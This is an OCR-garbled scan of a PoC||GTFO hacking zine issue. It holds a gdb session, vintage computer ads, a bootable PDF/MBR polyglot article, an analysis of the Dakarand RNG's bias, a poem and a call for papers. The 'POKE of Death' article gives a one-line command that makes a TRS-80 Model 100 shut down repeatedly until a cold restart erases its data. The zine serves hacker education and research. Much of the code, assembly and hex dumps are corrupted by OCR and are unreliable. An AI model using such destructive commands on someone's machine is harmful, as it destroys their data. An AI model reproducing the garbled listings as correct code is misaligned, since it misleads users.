Breakpoint 5, elf_machine_rela (sym=0x601030, reloc_addr_arg=0x6012e8, version=<optimized out>, 
reloc=0x601330, map=0x555555773228) at ../sysdeps/x86, 64/dl-machine.h:448 
448 value = ((E1f64 Addr (*) (void)) value) (); 
(gdb) print/x $rdi 
$15 = 0x601241 
(gdb) print/x value 
$16 = Ox7ffff7ce1184 
(gdb) x/10i value 
Ox7ffff7ce1184:push Arbx 
OxTfffficeii85:mov Aedi,/4r8d 
Ox7ffff7ceii88:mov 0х313с01 (гір) , 4rbx # Ox7ffff7ff4d90 
Ox7£fff7ce118Ff : mov (Arbx) , heax 
Ox7£fff£7ce1191:test $0x80, ћаћ 
Ox/7ffff7ce1194: jne Ox/7ffff7cellea 
Ox7ffff7ce1196:mov A£s:0x10,%r9 
OxTffff'iceii9f:mov 0x88 (Arbx) , гах 
Ox7ffff7ce11a6: cmp 0x8 (/rdx) ,⁄r9 
Ox/7ffff7cellaa:je Ox/ffff7celidf 
(gdb) print/x $rsi 
$4 = Ox7ffff7ce1184 


P.C. cards made simple=with COPYDAT! 


. Prepare the 1X artwork, using an opaque layout aid such as Chartpak, Bishop Graphics, or other 
similar product. 

2. Make a negative: Place the artwork face down, cover with the negative material colored film side 
up (we recommend Scotchcal products), and expose with the Copydat. Typical exposure time is 
1.5 minutes. 

3. Develop the negative in developer provided with negative material. 

. Attach negative to pre-sensitized face of copper board. Place board and negative face down on 
Copydat. Expose. Typical exposure time: 30 seconds. 
. Save the negative for reuse, and develop the board in the developer provided. 

3. Etch the board. 

. As a finishing touch, tin the board to avoid oxidation of the copper and to improve solderability. 

Result: a custom, high quality, single-sided P.C. board. 

With careful alignment, you can make doublesided boards too! 


Alternatively, buy high-quality hardware assemblers from us — and these are predrilled as well (bad 
feature plated-through holes): 


P.S. The Copydat does a lot more than make high-quality P.C. boards. It makes superior blueline, 
blackline, sepia, and other diazo process copies, and you can make pressure-sensitive labels with it 
and even instrument front panels from pre-sensitized metal plates ! ! 





from $149.95 (B size prints) PO BAT ea аса 
Amherst, N.H. 03031 
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3 





Just as Jonah was told to preach in Nineveh, 
Pastor Laphroaig was once called to preach to the harlots and tax collectors at RSAz 
Asked about the experience, he said that, like Jonah, 





he'd rather be thrown overboard than go backs 
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т POKE of Death for the TRS 80 Model 100 


by Dave Weinstein 


In his Epistle on the Divinity of Languages, PoC||GTFO 01:07, Pastor Manul Laphroig wrote of the 
merits of PEEK and РОКЕ in teaching the youth of а previous generation how to fiddle with hardware 
in ways the hardware did not want to be fiddled. 

And so I offer to you a short example of the wonders of POKE as applied to interrupt handlers. 

In 1983, Radio Shack introduced the Model 100, а copy of the Kyocera Kyotronic 85. With its 40 
character wide 8-line screen, built-in 300 baud modem, and up to 32k of RAM, it was a state of the art 
laptop, capable of generating endless questions from passengers and crew on any flight. 

In high memory, there is a vector at OxF5FF, which allows a program to hook the keyboard /clock 
interrupt. Every 4 ms or so, the timer interrupt fires, and the keyboard is polled. By default, the vector 
is a simple RET МОР ХОР. 

As it happens, the very next vector in high memory is a JMP to handle the low-power situation and 
shut the computer down. 


0 xf5ff 0xc9 (RET) 

0xf600 0x00 (NOP) 

Ох#601 0x00 (МОР) 

0xf602 0xc3 (JMP 0x1451) 
0xf603 0x31 

0xf604 0x14 


The function at 0x1431 will turn the computer off, as the code flows to the actual shutdown sequence 
at 0х1451: 


0x1451 di 
0x1452 in Oxba 
0x1454 ori 0x10 
0х1456 out Oxba 
0x1458 hlt 


Should we replace the RET at OxF5FF (62975) with a NOP, the Model 100 will power down every time 
the timer interrupt fires. The only way to restore functionality is to do a cold restart of the machine, 
which, if I recall correctly, in this case requires removing the batteries, unplugging the machine, and 
disabling the internal NiCad battery. All of the contents would be lost. For those who do not know what 
has been done, the computer shows every sign of having simply died. 

POKE 62975, 0 

The only way to prevent it is to prevent access to the BASIC interpreter. Which is possible, but is a 
discussion for another time. 





Figure 3: POKE 62975, 0 
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Matthew Green "Research Team" 


ма | 


~ 
m 


Request Powdered Rhino Horn I I = GER 
(бешен 0^ THE 6858 SUN 
Request 
- THE WINE 
Provide BBB E E 


Matt flies to Africa. 


Provide Rhino Powder 


Matt kidnaps Princess Peach. 





Hey, do you sell mail-order brides? 


Request $$$ 


I'm kinda shorton cash. 


Provide Princess Peach 


Matt steals Christmas pro bono. 
ма | 


Pastor Laphroaig tells us that the news is stranger than fiction, 
because unlike the news, fiction requires an element of truth. 
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8 This OS is also а PDF 


by Ange Albertini 


А careful reader may have noticed that a bootable OS image was hidden in the last issue of PoC || GTFO, 
as one of the files in its dual PDF/ZIP structure (if you haven't, download and extract it now!). This 
time, though, let's hide it in plain sight. You will find by running ‘qemu-system-i386 -fda pocorgtfo02.pdf" 
that the PDF file you are reading is also a bootable disk image. 


8.1 Requirements 


To combine two file types, we first need to list the requirements of each format and then produce a single 
file that meets both sets of requirements with no conflicts. 

What makes a bootable disk image? An X86 machine begins booting by copying the first 512 byte 
sector, the Master Boot Record, into RAM and executing it. The requirements for a functional MBR 
are simple: 


e 16 bit x86 code starts at offset 00. 

e It will be executing at the 0000:7c00 address in RAM. 

e It must be 512 bytes long, ending with the signature 55, AA 

e Labels and primary partition tables are optional, but can go within this sector. 


e [t must contain code that finds and loads into RAM the code for the next boot stage (such as an 
OS loader). 


PDF files are a mixture of text and binary fragments, which are parsed from the start of the file and 
delimited by words and newlines. The requirements for а valid PDF are also simple and surprisingly 


flexible: 
e It is initially parsed as text. 


e The signature ^7696PDF-" must be present within the first 1024 bytes. It can be present there twice 
or more. 


e Comment lines begin with ‘%’, which is 25 in hex. 
e Binary characters other than CRLF are acceptable in a comment. 


e “Multi-line” binary objects or simply larger objects can also be stored in object streams, which are 
declared like this: 


<obj number» «revision obj 
<<>> 

stream 

<stream content> 

endstream 

endobj 


8.2 Strategy 


In most cases, we can freely prepend anything at the start of the file as long as the above requirements 
are fulfilled. Luckily, the % comment character is 0x25, which encodes nicely as an x86 and instruction. 
Thus, the head of the file can be 25FFFF: and ax, Oxffff, which also starts a PDF comment. We can 
then add a jump into the next part of the code, which will be stored in a dummy object stream below, 
and then finish our first line. Adding а PDF signature will prevent any potential problem in case the 
stream object is too long: it can then contain anything, of any length, as long as it doesn't contain the 
'endstream' keyword. 
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; this will encode as ‘%\xff\xff\xeb\x21’, а comment line 
and ax, —l 
jup start 


YP DF 1.5 


999 0 obj 
<<>> 
stream 


code: 


‚ put the 55АА signature at the end of the 512 block 
times 200h — 2 — ($ — $$) db Осећ 
db 55h, Oaah 


endstream 
endobj 


8.3 An Unexpected Challenge 


This was almost too easy, but there is a caveat to keep in mind. ГІЇ mention it here to save you the 
headache when reproducing these results. 

This new challenge emerged as I was testing the bootable PDF files with different PDF readers. 
Since we pre-pend our MBR without altering the contents of the original document, the original’s cross- 
reference table XREF is no longer in sync with the actual file offsets. Technically, this makes the XR EF 
tables corrupted. 

Corrupted XREFs are so common that they are usually transparently recovered by all PDF readers, 
even picky ones such as PDF.JS. However, your pdflatex may generate a document based on the opti- 
mized PDF 1.5 specification, where the XREF is stored not in cleartext as in PDF 1.4, but rather as a 
separate, compressed object. This configuration choice is made for the user by the TeX distribution, so 
even a freshly updated pdflatex install may generate PDF 1.4 documents. 

Even when compressed, corrupted XREFs are recovered by some readers, such as GS and Sumatra. 
Unfortunately, Foxit, Adobe, Firefox, Chrome, and Poppler-based readers—such as Evince and Okular— 
would reject such a document. Although rejecting corrupted documents out of hand is the best strategy, 
even Pastor Laphroaig would be pretty pissed if folks couldn't read his epistles because of this. 

A simple and elegant workaround that achieves 10096 reader compatibility with our MBR PDF is to 
make sure that, even if your pdflatex distribution generates a 1.5 format document, it doesn't compress 
the XREF. This is easily done by adding the following command to your IXTEX source. 














\pdfobjcompresslevel=0 


This command will cause pdflatex to store non-objects uncompressed while still taking advantage of 
other 1.5 features such as reducing document bloat. I should add that, although the fix looks trivial, 
finding the real cause and the most elegant solution was a challenge. 





Enjoy booting this PDF, and be sure to share copies—both electronic and paper—so that your 
neighbors can enjoy it as well! 
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00000000 
00000010 
00000020 
00000030 
00000040 
00000050 
00000060 
00000070 
00000080 
00000090 
000000a0 
000000b0 
000000c0 
000000480 
00000060 
000000f0 
00000100 
00000110 
00000120 
00000130 
00000140 
00000150 
00000160 
00000170 
00000180 
00000190 
000001a0 
000001b0 
000001с0 
000001d0 
00000160 
000001f0 


25 
39 
T3 
54 
62 
6f 
69 
Od 
65 
20 
69 
69 
T4 
65 
6f 
65 
Od 
Of 
db 
b8 
00 
#5 
31 
31 
75 
44 
cd 
ff 
CG 
cc 
CC 
CC 


ff 
39 
T4 
46 
T9 
T2 
67 
00 
61 
20 
73 
33 
66 
61 
6d 
63 
00 
82 
b8 
00 
е0 
сЗ 
00 
с9 
fO 
45 
10 
eb 
CC 
CC 
CC 
CC 


Tf 
39 
72 
Af 
20 
20 
20 
59 
T4 
53 
3a 
38 
6f 
64 
20 
T5 
be 
97 
10 
Te 
07 
89 
89 
ад 
c3 
46 
be 
fe 
CC 
GC 
CC 
CC 


e9 
39 
65 
20 
52 
4d 
61 
6f 
65 
6f 
20 
36 
30 
69 
64 
T4 
27 
00 
02 
89 
e8 
c3 
d8 
e8 
30 
50 
58 
еа 
CC 
CC 
CC 
CC 


fc 
20 
61 
49 
T4 
61 
6e 
T5 
6e 
T2 
T1 
20 
32 
бе 
69 
69 
(До 
ре 
b5 
c6 
65 
СТ 
бї 
ас 
31 
56 
са 
00 
CC 
CC 
CC 
CC 


00 
30 
ба 
73 
2e 
6e 
64 
20 
20 
72 
65 
2d 
2e 
67 
73 
6e 
es 
CC 
00 
ед 
00 
ед 
e8 
ff 
32 
83 
b8 
00 
CC 
CC 
CC 
CC 


Оа 
20 
Оа 
(3 
20 
75 
20 
68 
62 
79 
ба 
66 
TO 
20 
6b 
67 
3e 
TE 
b1 
38 
ac 
Oc 
04 
e8 
33 
е0 
20 
ЁЁ 
СС 
CC 
CC 
CC 


25 
6f 
Оа 
Т5 
52 
бс 
46 
61 
79 
2e 
75 
64 
64 
6b 
2e 
20 
00 
e8 
02 
00 
3c 
e8 
e8 
2c 
34 
Of 
Ое 
ff 
CC 
CC 
CC 
CC 


50 
62 
50 
65 
76 
20 
72 
76 
20 
Oa 
2d 
61 
66 
65 
Oa 
6b 
31 
2c 
b6 
be 
00 
39 
29 
00 
35 
05 
са 
CC 
CC 
CC 
CC 
CC 


44 
ба 
бЕ 
20 
64 
4с 
69 
65 
61 
Od 
73 
20 
Oa 
72 
Od 
65 
cO 
00 
00 
eb 
T4 
00 
00 
83 
36 
83 
10 
cc 
eC 
cc 
CC 
CC 


46 
Oa 
43 
30 
2e 
61 
65 
20 
20 
54 
19 
70 
Od 
6e 
00 
72 
де 
b8 
b2 
T€ 
06 
89 
89 
ci 
37 
та 
c3 
CC 
CC 
CC 
CC 
CC 


2d 
3c 
20 
78 
20 
70 
6e 
62 
67 
72 
73 
6f 
00 
65 
32 
бе 
аё 
е0 
00 
е8 
р4 
аё 
аё 
02 
38 
89 
be 
CC 
CC 
CC 
CC 
CC 


31 
3c 
6f 
30 
50 
68 
64 
65 
T2 
19 
74 
63 
31 
6c 
29 
65 
30 
07 
са 
08 
Ое 
c1 
e8 
81 
39 
сб 
T2 
CC 
CC 
CC 
CC 
ce 


2e 
3e 
72 
32 
61 
T2 
T3 
65 
75 
20 
65 
бЕ 
29 
20 
20 
6c 
d2 
де 
13 
00 
са 
e8 
24 
f9 
41 
ac 
TG 
CC 
CC 
CC 
CC 
CC 


35 
Зе 
20 
Оа 
73 
6f 
Oa 
6e 
65 
T4 
6d 
T2 
20 
66 
45 
2e 
cd 
cO 
72 
еа 
10 
08 
00 
00 
42 
b4 
e8 
CC 
CC 
CC 
CC 
55 


Оа 
Оа 
47 
Od 
74 
61 
Оа 
20 
2е 
68 
2а 
67 
52 
72 
78 
Oa 
13 
31 
Tb 
00 
еђ 
ед 
c3 
02 
A3 
Ое 
95 
СС 
СС 
СС 
CC 
aa 


| ва нама APDF-1.5. | 
[9999 0 obj.<<>>. | 
|stream..PoC or Gl 
|ТЕО Issue 0х02.. | 
|by Rt. Rvd. Past| 
lor Manul Laphroa| 
lig and Friends..| 
|..You have been | 
leaten by а grue. | 
| Sorry...Try thl 
lis: qemu-system- | 
|1386 -fda pocorgl 
|tfo02.pdf...1) RI 
leading kernel fr| 
lom -disk oi 2.2). Ex 
|ecuting kernel.. | 
es bee РЕТ Oas 


ETETE ў 


Hey kids! Can you color the bytes of this МВК to indicate what's going on? 
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— Calculator 
Edit Меш Help 


7 Нех œ Dec < Oct С Bin * Пед С Had C Grad 


AUL 
за JL ee C OO ime) 7 Je је U Jive) (ana ) 


{ave ата (exo i in Jive JC JUs JU e JL ) ог (Хи) 
зит] sin (су its JUws (1 JU 2 JC JC- јап ј(миј 
(= Jos) Ges JU Je JLo Je JU JU om) 
(at }( tan Ја Jw) м JC JLB Ce JLo Je Cr) 





CALC.EXE||GTFO 
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9 A Vulnerability in Reduced Dakarand from PoC||GTFO 01:02 


by joernchen of Phenoelit 


I'm not а math guy, so this is а poor man's RNG analysis. Try it yourself at home! 


9.1 Introduction 


In PoC||GTFO 01:02, Dan Kaminsky proposed the following code for use as а Random Number Gen- 
erator, arguing that the phase difference between a fast clock and a slow clock is sufficient to produce 
random bits in a high level language. This is a reduced version of his Dakarand program, with the intent 
of the reduction being that if there is any vulnerability within the code, that vuln ought to be exploitable. 


// These functions form an RNG. 
function millis() {return Date.now();} 
function flip coin () 

{n=0; then = millis()+1; while( millis()<=then) {n=!n;} return n;} 
function get fair bit () 

{while(1) (a-flip coin(); if(a!'—flip coin()) {return(a);}}} 
function get random byte() 

{n=0; bits=8; while(bits ——){п<<=1; n|2get fair bit();) return n;} 





// Use it like this. 
report console = function() {while(1){console.log(get random byte());)] 
report console(); 


Actually the above code boils down to the function flip coin, which takes a boolean value п=0 and 
continuously flips it until the next millisecond. The outcome of this repeated flipping shall be a random 
bit. We neglect the get fair bit function mostly in this analysis, as it just slows down the process and 
adds almost no additional entropy. For gathering random bits we are just left with the clock ticking for 
us. 


9.2 А Naive Analysis 


In order to analyze the output of the RNG we need some of its output, 
so I simply put up а small HTML piece which would pull out 100.000 
random bytes out of the above RNG and log it to the HTML document. 
Then a severe 90-minute DoS on my Firefox 24 happened, after which I 
managed to copy and paste one hundred thousand uint8 t results into 
a text file. 

After messing with several tools like ministat, sort and uniq I could 
show with the following ruby script that this RNG (on my machine) 
has а strong bias towards bytes with low hamming weights: 


communicating 


#!/usr/bin/env ruby with your 
f—File.open (ARGV | 0 | ) „птісгоргос essor! 


$500 
h — Hash.new 
f.each line do |m| а == X 
п = т.ђ0 1 nin at 
if h[n]. nil? 
h[n]=1 
else 
h[n] = h[n]+1 
end 
end 





t = h.sort by do |k,v| v end 
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t.each do |а | 


puts "Num: \ На [0] | "+ 
"NtCount: На [1] } "+ 


"\tWeight:\t#{a|[0|].to s(2).split("").reject |] |ј=="0" |. count" 


епа 


The shortened output of this script on the 100К 8bit numbers is as follows. Note that the heavy 
hamming weights, like 11111111 are least common and the light hamming weights, like 00000000 are 


most common. 


Value Count 


295 
254 
251 
293 
127 
239 
191 
223 
247 


27 
29 
28 
29 
32 
34 
34 
36 
37 
1173 
1821 
1881 
1922 
1934 
2000 
2042 
2133 
2145 
3918 


к к == = = == у. 


Weight 


INN NNN o-d ч 00 


0 


The table lists the Number which is the output of the RNG along with this number's hamming weight 
as well as the count of this number in total within the 100.000 random bytes. For а random distribution 
of all possible bytes we could expect roughly a count of 390 for each byte. But as we see, the number 0 
with the hamming weight 0 peaks out with a count of 3918, whereas 255 with the hamming weight of 8 
is generated 22 times by the RNG. That's not fair! 


9.3 My fair bit is not fair! 


Real statistical analysis of an RNG is hard, and I will not attempt it here. 
Still, looking at a few simple distributions might give us a hint (alas, only a 


hint) of what might behind the unfairness. 


First, a short recap on how this RNG works: 
We've got а 1 millisecond timeslot from 60 to tl, where at 1 theflip coin 
method will stop. The first call to get random byte can happen anywhere 


between t0 and t1: 


Let's say it is here: 


Now the algorithm happily flips the bit until t1 and hands over the result 
of this flipping as a random bit (note that we're omitting get fair bit here). 


Somewhere here the JS engine jumps in 


deum 
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What is a 


CLOCALPEEP? 


Another name for x 
the CCB-II, which is: 
e а Clock 
hour, minute, second 
e a calendar 
day, day of week, 
month, year 
e an audio alarm 


АП on one board for your 


TRS-80 Model 1 


It includes a pacemaker battery which will 
give over 8 years of continuous timekeeping. 
From the folks who brought you the best 

CP/M® for the Model |. 
$175 plus shipping 
Prepaid, COD, Mastercharge or Visa orders 
accepted. California residents add 696 
les tax 


sa 
TRS-80 is a trademark of Tandy Corp. 
[ERES CP/M is a registered trademark of Digital Research Inc. 
Foot PICKLES & TROUT 
P. 


O. BOX 1206, GOLETA, CA 93116, (805) 967-9563 


Warning : Installation requires opening the Model || , which may void its 
warranty. We suggest that you wait until the warranty period has expired 





Although we cannot predict the output of а single run of flip coin, things get а bit more predictable 
when we make a lot of consecutive calls to flip coin. Let's say we need the time d to process and store 


the result of flip coin. So the next time we flip coin we are at t1 + 41: 


Now the RNG flips the coin until t2 in order to give us a random bit. As we are calling the RNG 
more than twice in a row, the next flip coin is at t2+d2, and so on. 

The randomness and fairness of the RNG's random bit depends on how fairly and randomly we get 
odd and even values of d, since that the same amount of flips yields the same bit as we have a static start 
value of O/false.!! So it makes sense to look at the distribution of d. To visualize this and to compare 
it with another browser I came up with this slight modification of the RNG that counts the flips and 


records them right inside the HTML page: 


function flip coin() 
{1=0;п=0; then=millis()+1; while(millis()c—then) {n=!n;i++} return [|n,i];j 


function get fair bit() 
{while(1) (a-flip coin(); if(a[O|!—-flip coin()[0]) {return(a);}}} 


function doit()1 
var i — 10000; 
while(i——){ 
var d = document.getElementByld(‘‘target’’); 
var content = document.createTextNode( get fair bit().toString() + ‘‘\n’’); 


d.appendChild ( content ); 




















Loading the page in Chromium and Firefox and throwing them into gnuplot, we get: 
Firefox Chromium 
450 20 | 
18 | "А 
350 - " 7 ++ 
„ 300 + а NEU > 4 
Ф Ф L 24 
с 250 + 4 Же M 
E Е 10 - "m | 
2 Es 4 2 
E 200 5 al по 
150 - | 6 - B _ 
100 - 4 | = 4 
-HEH 
Bore 2+ и l2 
+ + + HACHEM HAH 
0 + | | 0 | | | | | | | | 
10000 20000 30000 40000 50000 60000 70000 5000 10000 15000 20000 25000 30000 35000 40000 45000 50000 








Cycle Count Cycle Count 


We can see that the graph for Chromium has a lot more variance in the number of coin flip within 
a millisecond than that for Firefox. Although, strictly speaking, it might still be possible to get good 
randomness with poor variance if the few frequent values were to alternate just so due to some underlying 
scheduling magic, it seems reasonable to expect that the same magic would also increase the variance in 





the flip numbers. 
We can also see, with the help of simple UNIX tools, that Chromium counts do not peak out to a 


certain value, unlike those of Firefox: 
ll'The second coin flip in get fair bit complicates it a bit, but it cannot substantially improve the RNG’s entropy if it 


lacks in the first place. 
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$ sort iter Firefox|uniq —c|sort —n $ sort iter Chromium|uniq —c|sort —n 


176 15 


64683 45147 
181 64671 15 45282 
195 64673 16 44947 
195 64684 e 16 45004 
207 64717 l 16 45010 
217 64672 16 45076 
286 64718 16 45086 
318 64721 17 45059 
393 64719 17 45107 
405 64720 19 45092 


9.4 Closing words 


In conclusion we see that in Firefox under stress Dan’s RNG appears to fail at exactly the point he wanted 
to use as the main source of randomness. The tiny clock differentials used to gather the entropy are 
not given often enough in Firefox. There is still much room to stress this RNG implementation. Bonus 
rounds would include figuring exactly what the significant difference between the Firefox and Chromium 
JavaScript runtime is that causes this malfunction on Firefox. Also attacks on other JavaScript runtimes 
would be interesting to see. It might even be the case that this implementation has different results 
under different conditions with respect to CPU load. 





A broader question occurs: The Dakarand RNG relies on what could be called a “code clock." It may be 
that in many kinds of environments stressed code clocks tend to go into phase with one another. Driven 
by stress to seek comfort in each other's rhythms, their chance encounters may grow into something тоте 
close and intimate, grinding into periodic patterns. Which, of course, is bad for randomness. Can we 
learn to tell such environments from others, where periodization with stress doesn't happen? -PML 


MODEL CC-7 SPECIFICATIONS: 


DIGITAL DATA RECORDER $149.95 
FOR COMPUTER ог TELETYPE USE NEW — 8080 1/0 BOARD with ROM. 


A. Recording Mode: Tape saturation binary. 
This is not an FSK or Home type recorder. 
No voice capability. No Modem. (NRZ) 

B. Two channels (1) Clock, (2) Data. OR, Two 
data channels providing four (4) tracks on 
the cassette. Can also be used for Bi-Phase, 
Manchester codes etc. 

C. Inputs: Two (2). Will accept TTY, TTL or 
RS 232 digital. 

D. Outputs: Two (2). Board changeable from 
RS 232 to TTY or TTL digital. 

E. Runs at 2400 baud or less, Synchronous or 
Asynchronous. Runs at 4800 baud or less. 
Synchronous or Asynchronous, Runs at 
3.1''/sec. Speed regulation + .5% 


F. Compatability: Will interface any computer 
or terminal with a serial 1/0. (Altair, Sphere, 
M6800, PDP8, LSI 11, IMSAI, etc. 

G. Other Data: (110-220 V), (50-60 Hz); 3 
Watts total; UL listed 955D; three wire line 
cord; on/off switch; audio, meter and light 
operation monitors, Remote control of mo- 
tor optional. Four foot, seven conductor 
remoting cable provided. Uses high grade 
audio cassettes. 


H. Warrantee: 90 days. All units tested at 300 
and 2400 baud before shipment. Test cas- 
sette with 8080 software program included. 
This cassette was recorded and played back 
during quality control. 


ALSO AVAILABLE: MODEL CC-7A with vari- 
able speed motor. Uses electronic speed control 
at 4’'/sec. or less, Regulation + .296 

Runs at 4800 baud Synchronous or Asynchro- 
nous without external circuitry. 

Recommended for quantity users who ex- 
change tapes. Comes with speed adjusting tape 
to set exact speed. 


Any baud rate up to 4800 





Uses the industry standard tape satura- 
tion method to beat all FSK systems ten to 
one, No modems or FSK decoders required. 
Loads 8K of memory in 17 seconds. This 
recorder, using high grade audio cassettes, 
enables you to back up your computer by 
loading and dumping programs and data fast 
as you go, thus enabling you to get by with 
less memory. Can be software controlled. 


Model CC7 . . . $149.95 
Model CC7A... $169.95 


NATIONAL multiplex 


CORPORATION 
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Permanent Relief from “Bootstrap Chafing” 


This is our new “turnkey” board, Turn on 
your Altair or Imsai and go (No Bootstrap- 
ping). Controls one terminal (CRT or TTY) 
and one or two cassettes with all programs 
in ROM. Enables you to turn on and just 
type in what you want done. Loads, Dumps, 
Examines, Modifies from the keyboard in 
Hex. Loads Octal. For the cassettes, it is a 
fully software controlled Load and Dump at 
the touch of a key. Even loads MITS Basic. 
Ends ‘Bootstrap Chafe” forever, Uses 512 
bytes of ROM, one UART for the terminal 
and one USART for the Cassettes. Our 
orders are backing up on this one. No. 2SIO 
(R) 


Kit form $140. 
tested $170.00 


Send Two Dollars for Cassette Operating 
and Maintenance Manual with Schematics 
and Software control data for 8080 and 
6800. Includes Manual on 
I/O board above. Postpaid 


— Fully assembled and 


Master Charge & BankAmericard accepted. 


On orders for Recorders and Kits please add 
$2.00 for Shipping & Handling. 
(N.J. Residents add 5% Sales Tax) 


3474 Rand Avenue, Box 288 
South Plainfield, New Jersey 07080 
(201) 561-3600 


This page intentionally left blank. 
Draw your own damned picture. 
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10 Juggernauty 
by Ben Nagy 


‘Twas UMBRA, and the STUNT WORMS 
Did ZARF and CIMBRI in the SUEDE: 
All GUPY were the PUZZLECUBES, 
And the DIRESCALLOP AQUACADE. 
“Beware the JUGGERNAUT, my son! 
The RONIN bytes, the IMSI catch! 
Beware the TUSKATTIRE, and shun 
EGOTISTICAL GIRAFFE!” 


He brought his FERRET CANNON forth: 
yet SKOPE he not Ше RUTLEY spoor — 
So browsed he to an onion, 

And surfed awhile in Tor. 


And, as in BOOTY Tor he surfed, 

The JUGGERNAUT, with eyes of FLAME, 
Leapt from the EVOLVED MUTANT BROTH, 
with DISHFIRE as it came! 


One, two! One, two! And through and through 
The FERRET CANNON’s furred attack! 

He left it dead, and with its LED 

He rode his QUICK ANT back. 


“And, has thou slain the JUGGERNAUT? 
Come to my arms, my DANGERMOUSE! 
OLYMPIC day! MESSIAH! MORAY!” 

He TALKQUICK in his joy. 


‘Twas UMBRA, and the STUNT WORMS 
Did ZARF and CIMBRI in the SUEDE; 
All GUPY were the PUZZLECUBES, 
And the DIRESCALLOP AQUACADE. 
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“Не that is without sin among уоп, 
let him first cast a stone at her." 
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11 А Call for PoC 
by Rt. Revd. Pastor Мати Laphroaig 


We stand, sit, or simply relax and chill on the shoulders of the giants, Phrack and Uninformed. They 
pushed the state-of-the-art forward mightily with awesome, deep papers and at times even with poetry 
to match. And when a single step carries you forward by a measure of academic years, it’s OK to move 
slowly. 

But for the rest of us dwarves, running around or lounging on those broad shoulders can be so much 
fun! A hot PoC is fun to toss to a neighbor, and who knows what some neighbor will cook up with it 
for the shared roast of the vuln-beast? A neighbor might think, “my PoC is unexploitable" or “it is too 
simple," but verily I tell you, one neighbor's PoC is the missing cog for another neighbor's Одау. How 
much PoC is hoarded and lies idle while its matching piece of PoC wastes away in another hoard? Let's 
find out! 


11.1 Author guidelines 


Do this: Write an email telling our editors how to do reproduce *ONE* clever, technical trick from your 
research. 

Like an email, keep it short. Like an email, you should assume that we already know more than a 
bit about hacking, and that we'll be insulted or—WORSE!—that we'll be bored if you include a long 
tutorial where a quick reminder would do. Don't try to make it thorough or broad. 

Do pick one quick, clever low-level trick and explain it in a few pages. Teach me how to implement 
Dakarand in a 512-byte boot sector; teach me how to compose shellcode in Korean characters; or, teach 
me how to patch Natalie's Tamagotchi shellcode with nothing but MSPAINT.EXE. Don't tell me that it's 
possible; rather, teach me how to do it myself with the absolute minimum of formality and bullshit. 

Like an email, I expect informal (or faux-biblical) language and hand-sketched diagrams. Write it 
in а single sitting, and leave any editing for our poor bastard of an editor to apply to later drafts. 
Send this to pastor@phrack.org and hope that the neighborly Phrack folks—praise be to them!—aren’t 
man-in-the-middling our submission process. 





11.2 Other Departments 


Editor at Large Rt. Revd. Pastor M.L. 

Dept. of Bringing APT Home | Cultural attaché of the 41st Directorate 
Dept. of Funky File Formats Ange Albertini 

Dept. of Fail FX of Phenoelit 

Ethics Board The Стига 

Dept. of Busting BS pipacs 

Poet Laureate Ben Nagy 

Dept. of Drama Xbf 

Dept. of PHY Michael Ossmann 
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